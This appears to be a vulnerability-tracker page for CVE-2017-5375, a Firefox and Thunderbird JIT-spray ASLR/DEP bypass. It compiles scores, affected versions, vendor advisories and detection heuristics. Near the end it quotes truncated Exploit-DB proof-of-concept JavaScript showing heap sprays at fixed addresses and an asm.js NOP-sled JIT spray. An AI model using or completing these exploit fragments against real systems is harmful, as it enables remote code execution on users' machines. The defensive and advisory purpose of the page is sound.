CVE-2017-5375
Published 2018-06-11
Priority P2 · 64 · critical · 9.8 (CVSS 3.0)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit: EPSS 33.43% (98.2th percentile)
JIT code allocation can allow for a bypass of ASLR and DEP protections leading to potential memory corruption attacks. This vulnerability affects Thunderbird < 45.7, Firefox ESR < 45.7, and Firefox < 51.
Affected (24 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | debian_linux | — | — |
| debian | firefox | < firefox 51.0-1 (sid) | firefox 51.0-1 (sid) |
| debian | firefox-esr | < firefox 51.0-1 (sid) | firefox 51.0-1 (sid) |
| mozilla | firefox | < 45.7.0 | 45.7.0 |
| mozilla | firefox | < 51.0.1 | 51.0.1 |
| mozilla | firefox | >= 0 < 51.0.1+build2-0ubuntu0.14.04.1 | 51.0.1+build2-0ubuntu0.14.04.1 |
| mozilla | firefox | >= 0 < 51.0.1+build2-0ubuntu0.14.04.2 | 51.0.1+build2-0ubuntu0.14.04.2 |
| mozilla | firefox | >= 0 < 51.0.1+build2-0ubuntu0.16.04.1 | 51.0.1+build2-0ubuntu0.16.04.1 |
| mozilla | firefox | >= 0 < 51.0.1+build2-0ubuntu0.16.04.2 | 51.0.1+build2-0ubuntu0.16.04.2 |
| mozilla | firefox | >= unspecified < 51 | 51 |
| mozilla | firefox_esr | >= unspecified < 45.7 | 45.7 |
| mozilla | thunderbird | < 45.7.0 | 45.7.0 |
| mozilla | thunderbird | >= 0 < 1:45.7.0+build1-0ubuntu0.14.04.1 | 1:45.7.0+build1-0ubuntu0.14.04.1 |
| mozilla | thunderbird | >= 0 < 1:45.7.0+build1-0ubuntu0.16.04.1 | 1:45.7.0+build1-0ubuntu0.16.04.1 |
| mozilla | thunderbird | >= unspecified < 45.7 | 45.7 |
| redhat | enterprise_linux_desktop | — | — |
| redhat | enterprise_linux_desktop | — | — |
| redhat | enterprise_linux_desktop | — | — |
| redhat | enterprise_linux_server | — | — |
| redhat | enterprise_linux_server | — | — |
| redhat | enterprise_linux_server | — | — |
| redhat | enterprise_linux_workstation | — | — |
| redhat | enterprise_linux_workstation | — | — |
| redhat | enterprise_linux_workstation | — | — |
Detection & IOCs (extracted from sources)
Bytes: 0xa8909090 (repeated NOP sled pattern in ASM.JS JIT spray)
Detection heuristics:
- Detect ASM.JS JIT-spray by monitoring for repeated arithmetic additions using the constant 0xa8909090 within asm.js modules, indicative of a NOP sled embedded in JIT-compiled code.
- Detect exploit trigger pattern: use of Web Workers combined with SVG namespace, ArrayBuffer allocations of sizes 0x80 and 0x100, and large Array heap sprays (0x1000, 0x4000 elements) in the same page context.
- Detect large-scale ASM.JS module spraying: creation of thousands of identical asm.js module instances (e.g., 0x1800 or 0x1000 regions) used to predictably place JIT-compiled shellcode at known memory addresses.
- Detect heap spray of fake DOM node objects targeting fixed addresses (e.g., 0x20200000, 0x30300000, 0x5a500000) using large ArrayBuffer blocks with crafted offsets, characteristic of this JIT-spray exploit chain.
- Firefox versions below 51 and Firefox ESR / Thunderbird below 45.7 are vulnerable; flag use of these specific versions in network traffic User-Agent strings or software inventory.
- The exploit uses a fixed ArrayBuffer offset of 0x88 for Firefox 50.0.1 to corrupt object internals; monitor for ArrayBuffer index manipulation at this specific offset in conjunction with asm.js spray activity.
Caveats:
- The hardcoded JIT payload target addresses (e.g., 0x1c1c0054, 0x3c3c1dc8, 0x20200b58) are version-specific and rely on predictable JIT code placement; they will differ across Firefox builds, OS versions, and ASLR states.
- The exploit's ArrayBuffer corruption offset (0x88) is specific to Firefox 50.0.1 on Windows 32-bit; this value will vary for other Firefox versions or platforms.
- The float constant pool offset for asm.js JIT spray (0xXXXX1dc8 for Fx 44.0.2, 0xXXXX0b58 for Fx 46.0.1) is version-specific and must be recalculated for other builds.
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | 2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| osv | — | 9.8 | CRITICAL | — |
| vendor_debian | — | 9.8 | CRITICAL | — |
| vendor_redhat | — | 9.8 | CRITICAL | — |
| vendor_ubuntu | — | 9.8 | CRITICAL | — |
Ubuntu: Firefox regression
vendor_ubuntu · 2017-02-06 · CVSS 9.8 · CRITICAL
Summary: USN-3175-1 introduced a regression in Firefox.
USN-3175-1 fixed vulnerabilities in Firefox. The update caused a
regression on systems where the AppArmor profile for Firefox is set to
enforce mode. This update fixes the problem.
We apologize for the inconvenience.
Original advisory details:
Multiple memory safety issues were discovered in Firefox. If a user were
tricked in to opening a specially crafted website, an attacker could
potentially exploit these to cause a denial of service via application
crash, or execute arbitrary code. (CVE-2017-5373, CVE-2017-5374)
JIT code allocation can allow a bypass of ASLR protections in some
circumstances. If a user were tricked in to opening a specially crafted
website, an attacker could potentially exploit this
Ubuntu: Thunderbird vulnerabilities
vendor_ubuntu · 2017-01-28 · CVSS 9.8 · CVE-2016-9893 · CRITICAL
Summary: Several security issues were fixed in Thunderbird.
Multiple memory safety issues were discovered in Thunderbird. If a user were
tricked in to opening a specially crafted message, an attacker could
potentially exploit these to cause a denial of service via application
crash, or execute arbitrary code. (CVE-2016-9893, CVE-2017-5373)
Andrew Krasichkov discovered that event handlers on elements
were executed despite a Content Security Policy (CSP) that disallowed
inline JavaScript. If a user were tricked in to opening a specially
crafted website in a browsing context, an attacker could potentially
exploit this to conduct cross-site scripting (XSS) attacks.
(CVE-2016-9895)
A memory corruption issue was discovered in WebGL in some circumstances.
If
Ubuntu: Firefox vulnerabilities
vendor_ubuntu · 2017-01-27 · CVSS 9.8 · CVE-2017-5373 · CRITICAL
Summary: Firefox could be made to crash or run programs as your login if it opened a malicious website.
Multiple memory safety issues were discovered in Firefox. If a user were
tricked in to opening a specially crafted website, an attacker could
potentially exploit these to cause a denial of service via application
crash, or execute arbitrary code. (CVE-2017-5373, CVE-2017-5374)
JIT code allocation can allow a bypass of ASLR protections in some
circumstances. If a user were tricked in to opening a specially crafted
website, an attacker could potentially exploit this to cause a denial of
service via application crash, or execute arbitrary code. (CVE-2017-5375)
Nicolas Grégoire discovered a use-after-free when manipulating XSL in
XSLT documents in some circ
Red Hat: Mozilla: Excessive JIT code allocation allows bypass of ASLR and DEP (MFSA 2017-02)
vendor_redhat · 2017-01-24 · CVSS 9.8 · CVE-2017-5375 · CRITICAL
JIT code allocation can allow for a bypass of ASLR and DEP protections leading to potential memory corruption attacks. This vulnerability affects Thunderbird < 45.7, Firefox ESR < 45.7, and Firefox < 51.
Debian: CVE-2017-5375: firefox - JIT code allocation can allow for a bypass of ASLR and DEP protections leading to potential memory corruption attacks
vendor_debian · 2017 · CVSS 9.8 · CVE-2017-5375 · CRITICAL
JIT code allocation can allow for a bypass of ASLR and DEP protections leading to potential memory corruption attacks. This vulnerability affects Thunderbird < 45.7, Firefox ESR < 45.7, and Firefox < 51.
Scope: local
sid: resolved (fixed in 51.0-1)
GHSA: GHSA-m73w-mj59-ggvj: JIT code allocation can allow for a bypass of ASLR and DEP protections leading to potential memory corruption attacks
ghsa_unreviewed · 2022-05-14 · CVE-2017-5375 · CWE-119 · CRITICAL
JIT code allocation can allow for a bypass of ASLR and DEP protections leading to potential memory corruption attacks. This vulnerability affects Thunderbird < 45.7, Firefox ESR < 45.7, and Firefox < 51.
OSV: CVE-2017-5375: JIT code allocation can allow for a bypass of ASLR and DEP protections leading to potential memory corruption attacks
osv · 2018-06-11 · CVSS 9.8 · CVE-2017-5375 · CRITICAL
JIT code allocation can allow for a bypass of ASLR and DEP protections leading to potential memory corruption attacks. This vulnerability affects Thunderbird < 45.7, Firefox ESR < 45.7, and Firefox < 51.
No detection rules found.
Exploit-DB: Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution
exploitdb · 2018-03-16 · CVSS 8.8 · CVE-2017-5375 · HIGH

```javascript
/* CVE-2016-1960 and ASM.JS JIT-Spray */
"use strict"
var Exploit = function(){
    this.asmjs = new Asmjs()
    this.heap = new Heap()
}
Exploit.prototype.go = function(){
    /* target address of fake node object */
    var node_target_addr = 0x20200000
    /* target address of asm.js float pool payload*/
    var target_eip = 0x3c3c1dc8
    /* spray fake Node objects */
    this.heap.spray(node_target_addr, target_eip)
    /* spray asm.js float constant pools */
    this.asmjs.spray_float_payload(0x1800)
    /* go! */
    this.trigger_vuln(node_target_addr)
};
Exploit.prototype.trigger_vuln = function(node_ptr){
    document.body.innerHTML = ''
    this.heap.gc()
    var a = new Array()
    for (var i=0; i td';
    */
    /* easier to exploit codepath */
    document.getElementById(
```
Exploit-DB: Firefox 46.0.1 - ASM.JS JIT-Spray Remote Code Execution
exploitdb · 2018-03-16 · CVSS 8.8 · CVE-2017-5375 · HIGH

```javascript
/* CVE-2016-2819 and ASM.JS JIT-Spray */
"use strict"
var Exploit = function(){
    this.asmjs = new Asmjs()
    this.heap = new Heap()
}
Exploit.prototype.go = function(){
    /* target address of fake node object */
    var node_target_addr = 0x5a500000
    /* target address of asm.js float pool payload*/
    var target_eip = 0x20200b58
    /* spray asm.js float constant pools */
    this.asmjs.spray_float_payload(0x1000)
    /* spray fake Node objects */
    this.heap.spray(node_target_addr, target_eip)
    /* go! */
    this.trigger_vuln(node_target_addr)
};
Exploit.prototype.trigger_vuln = function(node_ptr){
    document.body.innerHTML = ''
    this.heap.gc()
    var a = new Array()
    for (var i=0; i hr {}'
    */
    /* easier to exploit codepath */
    document.getElementById('BBBB').out
```
Exploit-DB: Firefox 50.0.1 - ASM.JS JIT-Spray Remote Code Execution
exploitdb · 2017-07-14 · CVSS 7.5 · CVE-2017-5375 · HIGH

```javascript
function asm_js_module(){
    "use asm";
    /* huge jitted nop sled */
    function payload_code(){
        var val = 0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa890
```
References
- http://rhn.redhat.com/errata/RHSA-2017-0190.html
- http://rhn.redhat.com/errata/RHSA-2017-0238.html
- http://www.securityfocus.com/bid/95757
- http://www.securitytracker.com/id/1037693
- https://bugzilla.mozilla.org/show_bug.cgi?id=1325200
- https://security.gentoo.org/glsa/201702-13
- https://security.gentoo.org/glsa/201702-22
- https://www.debian.org/security/2017/dsa-3771
- https://www.debian.org/security/2017/dsa-3832
- https://www.exploit-db.com/exploits/42327/
- https://www.exploit-db.com/exploits/44293/
- https://www.exploit-db.com/exploits/44294/
- https://www.mozilla.org/security/advisories/mfsa2017-01/
- https://www.mozilla.org/security/advisories/mfsa2017-02/
- https://www.mozilla.org/security/advisories/mfsa2017-03/